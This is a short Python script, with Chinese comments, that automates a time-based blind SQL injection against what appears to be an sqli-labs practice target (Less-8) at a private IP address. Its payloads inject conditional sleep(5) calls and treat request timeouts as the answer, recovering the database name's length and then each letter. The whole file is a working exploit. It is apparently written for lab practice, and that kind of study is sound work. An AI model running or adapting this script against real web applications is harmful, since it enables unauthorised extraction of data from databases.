import requests

url = "http://192.168.10.135/sql-lab/Less-8/?id=1"

def timeout(url):
	try:
		response = requests.get(url,timeout=3)
		return response.text
	except:
		return "sorry_timeout"

# 1.sql注入测试数据库长度


def time_sqli():
	dbnameLen = 1
	while 1 :
		payload1 = f"' and if(length(database()) = {dbnameLen},sleep(5),true)--+"
		exp1 = url + payload1
		print(f"正在测试长度：{dbnameLen}")
		if "sorry_timeout" in timeout(exp1):
			print(f"注入成功！数据库长度为：{dbnameLen}")
			break
		dbnameLen += 1

	# 2.sql注入测试数据库名称

	databaseName = ""
	for i in range(1,dbnameLen + 1):
		count = 97
		while 1:
			payload2 = f"' and if(ascii(substr(database(),{i},1)) = {count},sleep(5),true)--+"
			exp2 = url + payload2
			print(f"正在测试第{i}个字母")
			if "sorry_timeout" in timeout(exp2):
				a = chr(count)
				print(f"注入成功！数据库名称的第{i}个字母为{a}")
				databaseName += a
				break
			count += 1

	print(f"sql注入成功，数据库的名称为：{databaseName}")

if __name__ == '__main__':
	time_sqli()